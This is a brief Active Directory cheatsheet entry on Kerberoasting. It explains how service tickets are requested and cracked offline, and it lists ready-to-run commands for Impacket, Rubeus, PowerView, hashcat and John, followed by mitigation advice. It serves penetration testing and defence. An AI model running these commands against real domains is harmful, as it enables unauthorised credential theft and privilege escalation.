Kerberoasting
Active Directory cheatsheet — Active Directory enumeration and attack techniques.
Overview
Kerberoasting extracts service account TGS (Ticket Granting Service) tickets from Active Directory for offline password cracking. Any domain user can request TGS tickets for any service, and these tickets are encrypted with the service account's NTLM hash.
This is one of the most common AD attack techniques for lateral movement and privilege escalation.
Category: Active Directory — Active Directory enumeration and attack techniques.
Key Commands & Payloads
The following commands and payloads are commonly used when testing for or exploiting Kerberoasting:
impacket-GetUserSPNs -dc-ip 10.10.10.10 domain.local/user:password -requestRubeus.exe kerberoast /outfile:hashes.txtGet-NetUser -SPN | select name,samaccountname,serviceprincipalnameRequest-SPNTicket -SPN "MSSQLSvc/sql.domain.local:1433" -Format Hashcathashcat -m 13100 hashes.txt wordlist.txtjohn --format=krb5tgs hashes.txt --wordlist=wordlist.txtTools & Techniques
Recommended tools for Kerberoasting:
- Impacket GetUserSPNs: request TGS tickets remotely
- Rubeus: kerberoast action for Windows systems
- PowerView: identify accounts with SPNs
- Hashcat (mode 13100) or John for offline cracking
Prevention & Mitigation
Security recommendations to prevent Kerberoasting:
- Use managed service accounts (gMSA) with automatic password rotation
- Ensure service account passwords are complex and long (25+ characters)
- Limit SPN assignment to necessary accounts only
- Monitor for kerberoasting activity (Event ID 4769 with RC4 encryption)
- Use Group Managed Service Accounts where possible
References
Additional resources: